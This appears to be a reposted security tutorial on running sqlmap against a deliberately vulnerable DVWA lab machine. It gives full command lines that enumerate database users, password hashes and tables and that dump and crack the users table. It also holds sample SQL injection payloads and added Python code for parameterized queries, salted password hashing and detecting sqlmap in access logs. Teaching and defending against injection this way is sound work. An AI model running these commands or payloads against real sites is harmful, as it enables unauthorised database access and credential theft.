What is Sqlmap?
Sqlmap is a free, open-source tool that detects and exploits SQL injection vulnerabilities. Its main strength is that detection and exploitation are automated: database fingerprinting, access to the underlying file system, and command execution on the database host.
Readers can download the Sqlmap source from the project's page on SourceForge: http://sourceforge.net/projects/sqlmap/
Who are the authors of Sqlmap?
Bernardo Damele Assumpcao Guimaraes (@inquisb), who can be reached at bernardo@sqlmap.org, and Miroslav Stampar (@stamparm), who can be reached at miroslav@sqlmap.org.
All sqlmap developers can be reached together through dev@sqlmap.org.
What is the command to run Sqlmap?
Change into the directory where sqlmap.py is located and run:
python sqlmap.py -h
The list of options is long and differs somewhat between versions, so it is not reproduced here; download the latest version and view the list on your own machine.
Sqlmap's command options are grouped into target options, request options, optimization, injection, detection, techniques, fingerprinting, enumeration, and so on.
How to use Sqlmap:
For the demonstration we created two virtual machines:
1. The victim machine, running Windows XP with a web server hosting a deliberately vulnerable web application (DVWA).
2. The attack machine, running Ubuntu 12.04 with Sqlmap installed.
Objective of this experiment: use Sqlmap to obtain the following information:
1. Enumerate the MySQL usernames and password hashes.
2. Enumerate all databases.
3. Enumerate the tables of a specified database.
4. Enumerate all usernames and passwords in a specified table.
Before running Sqlmap we capture the current session cookie, which keeps the session state during the test; it was obtained with the Firefox add-on "Tamper Data".
The cookie obtained is "security=high; PHPSESSID=57p5g7f32b3ffv8l45qppudqn3".
For ease of demonstration, we set the DVWA security level to Low:
Next we go to the "SQL Injection" page, enter any value and submit. The id parameter of the resulting GET request can be seen in the URL:
http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
This page is our target.
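The id parameter above is the injection point. As an added example (not part of the original article and not DVWA's own PHP), the following Python/sqlite3 model shows the query shape that makes such a page injectable next to the parameterized form that an injection tool cannot get past. The table layout and rows are constructed sample data, and the query shape is an assumption modelled on DVWA's low-security handler.

```python
import sqlite3

# Constructed sample rows (user_id, first_name, last_name); not DVWA's real data.
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL database behind the DVWA page."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Query assembled by string interpolation: whatever arrives in ?id= becomes SQL.

    This is the shape assumed for the 'low' handler and the reason the page is injectable.
    """
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Same query with a bound parameter: the driver sends the value, never as SQL text."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tampered = "1' OR '1'='1"          # the classic boolean tautology sent through ?id=
    print("vulnerable, id=1      ->", lookup_vulnerable(db, "1"))
    print("vulnerable, tampered  ->", lookup_vulnerable(db, tampered))   # every row
    print("parameterized, tampered ->", lookup_safe(db, tampered))       # no row
```

The parameterized version returns nothing for the tampered value because the whole string is compared against user_id as data; no amount of quoting in the input changes the statement the database parses.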
The following command retrieves the DBMS banner, the current database and the current user:
./sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low" -b --current-db --current-user
Options used:
1. --cookie: set our cookie value (here it also switches the DVWA security level from high to low)
2. -u: the target URL
3. -b: retrieve the DBMS banner
4. --current-db: retrieve the current database
5. --current-user: retrieve the current user
The results are as follows:
DBMS: MySQL version 5.0
OS: Ubuntu 12.04
current user: root
current database: dvwa
The following command enumerates all DBMS users and their password hashes; the hashes can be cracked in a follow-up step:
./sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low" --string="Surname" --users --passwords
Options used:
1. --string: a string that appears in the page when the injected query evaluates to true (used to tell true from false responses)
2. --users: enumerate DBMS users
3. --passwords: enumerate the DBMS users' password hashes
The results are as follows:
database management system users:
[*] ''@'KINGASMK'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'KINGASMK'
[*] 'root'@'localhost'
database management system users password hashes:
password hash: *c30441e06530498bc86019bf3211b94b3bab295a
[*] phpmyadmin [1]:
    password hash: *c30441e06530498bc86019bf3211b94b3bab295a
[*] root [4]:
    password hash: *c30441e06530498bc86019bf3211b94b3bab295a
    password hash: *c30441e06530498bc86019bf3211b94b3bab295a
    password hash: *c30441e06530498bc86019bf3211b94b3bab295a
    password hash: *c30441e06530498bc86019bf3211b94b3bab295a
Readers can use Cain & Abel, John the Ripper and similar tools to recover the plaintext from these hashes. The following command enumerates all databases on the server:
./sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low" --dbs
Options used:
--dbs: enumerate the databases in the DBMS
The results are as follows:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
Next we enumerate the tables of the dvwa database with the following command:
./sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low" -D dvwa --tables
Options used:
1. -D: the DBMS database to enumerate
2. --tables: enumerate the tables in the given database
The results are as follows:
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
Next we get the columns of the users table:
./sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low" -D dvwa -T users --columns
Options used:
-T: the DBMS table to enumerate
--columns: enumerate all columns of the given table
The results are as follows:
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+
Of these, the user and password columns are the ones we are interested in, since they hold the username and password. Now we extract the contents of those columns. The following command dumps all usernames and passwords from the user and password columns of the users table:
./sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low" -D dvwa -T users -C user,password --dump
Options used:
-T: the DBMS table to enumerate
-C: the columns of the table to enumerate
--dump: dump the table entries
Sqlmap asks whether to crack the password hashes with its dictionary attack; press ENTER to confirm.
All usernames and plaintext passwords are obtained as follows:
Table: users
[5 entries]
+---------+---------+---------------------------------------------+
| user_id | user    | password                                    |
+---------+---------+---------------------------------------------+
| 1       | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 2       | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| 4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------+---------------------------------------------+
With the admin account we can then log in and do anything.
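The dump above shows why this storage scheme fails the moment the table leaks: the hashes are unsalted MD5, so admin and smithy (both "password") share the same hash, and the dictionary attack sqlmap offers recovers the plaintext instantly. As an added example (not code from the original article or from DVWA), the following Python flags shared hashes in a dumped table and shows salted PBKDF2 storage, under which equal passwords no longer produce equal hashes and each guess costs a full key derivation. The five dumped rows are copied from the article's table; the storage format string and iteration count are assumptions of this example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Work factor for PBKDF2-HMAC-SHA256 (an assumed value for this example; production
# deployments should use the largest count their login latency budget allows).
ITERATIONS = 200_000

# Copy of the rows from the article's dump: (user, md5 hex). Constructed for this example.
DUMPED_USERS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("gordonb", "e99a18c428cb38d5f260853678922e03"),
    ("1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    ("pablo", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    ("smithy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]


def md5_hex(password: str) -> str:
    """Unsalted MD5, the scheme the dumped users table uses (shown only for comparison)."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def shared_hashes(rows):
    """Map every hash that more than one account shares to the list of those accounts.

    Any non-empty result means the store is unsalted (or the salt is constant), because
    a proper per-user salt makes equal passwords hash differently.
    """
    by_hash = {}
    for user, digest in rows:
        by_hash.setdefault(digest, []).append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256; stored as 'pbkdf2_sha256$<iters>$<salt hex>$<digest hex>'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("accounts sharing a hash in the dump:", shared_hashes(DUMPED_USERS))
    salted = [(user, hash_password("password")) for user in ("admin", "smithy")]
    print("accounts sharing a hash after salting:", shared_hashes(salted))
    print("verify admin:", verify_password("password", salted[0][1]))
```

The shared-hash check is a useful audit to run over your own user table: if it returns anything, every user in a group has the same password and the hashes are unsalted, which is exactly the condition that lets a dump be turned into plaintext in seconds.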
Summary:
Sqlmap is a very powerful tool that simplifies and automates the detection and exploitation of SQL injection.
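The same automation that makes the run above quick also makes it loud in the web server's access log: the stock user-agent string contains "sqlmap", and every probe carries recognisable SQL fragments in the query string. As an added example (not code from the original article or from the sqlmap project), the following Python scans Apache combined-format log lines, URL-decodes the query string, and flags requests by user-agent and payload pattern, then reports source addresses that produced a burst of hits. The log lines are constructed for this example, with 10.10.10.3 as an assumed attacker address talking to the article's DVWA host; the fourth line uses a browser user-agent to show why the payload check matters (sqlmap's --random-agent option replaces the default agent string).

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" log format:
# ip - - [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fragments that show up in injection probes once the query string is URL-decoded.
# Ordered from most to least specific; the first match is reported.
PAYLOAD_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"\bunion\b.{0,40}\bselect\b",   # column-count / data-extraction probes
        r"\binformation_schema\b",       # schema enumeration
        r"'\s*(or|and)\s*['\d]",         # boolean probes such as ' AND 1=1
        r"\b(sleep|benchmark)\s*\(",     # time-based probes
        r"(--|/\*)\s*(&|$)",             # SQL comment cutting off the rest of the query
    )
]

# Constructed sample log (not from the original article).
SAMPLE_LOG = [
    '10.10.10.3 - - [01/Jan/2013:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/18.0"',
    '10.10.10.3 - - [01/Jan/2013:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1%20AND%20%27a%27%3D%27a&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '10.10.10.3 - - [01/Jan/2013:10:00:06 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%20NULL%2CNULL--%20&Submit=Submit HTTP/1.1" 200 5555 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '10.10.10.3 - - [01/Jan/2013:10:00:07 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29--%20&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/18.0"',
    '10.10.10.7 - - [01/Jan/2013:10:01:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 2000 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/18.0"',
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Reasons a single request looks like automated SQL injection probing."""
    reasons = []
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap user-agent")
    decoded = unquote_plus(entry["path"])   # %27 -> ', %20 -> space, and so on
    for pat in PAYLOAD_PATTERNS:
        if pat.search(decoded):
            reasons.append(f"payload pattern {pat.pattern!r}")
            break
    return reasons


def scan(lines, burst_threshold=3):
    """Return (hits, bursts): flagged requests, and source IPs with >= threshold hits."""
    hits = []
    per_ip = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["path"], reasons))
            per_ip[entry["ip"]] += 1
    bursts = {ip: n for ip, n in per_ip.items() if n >= burst_threshold}
    return hits, bursts


if __name__ == "__main__":
    found, noisy = scan(SAMPLE_LOG)
    for ip, path, reasons in found:
        print(ip, unquote_plus(path), reasons)
    print("bursting sources:", noisy)
```

The user-agent check is the cheapest signal but also the easiest to remove, so the payload patterns and the per-source burst count carry the real weight; in practice feed the same three signals to whatever log pipeline or WAF you already run rather than to a standalone script.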
[Via Infosecinstitute]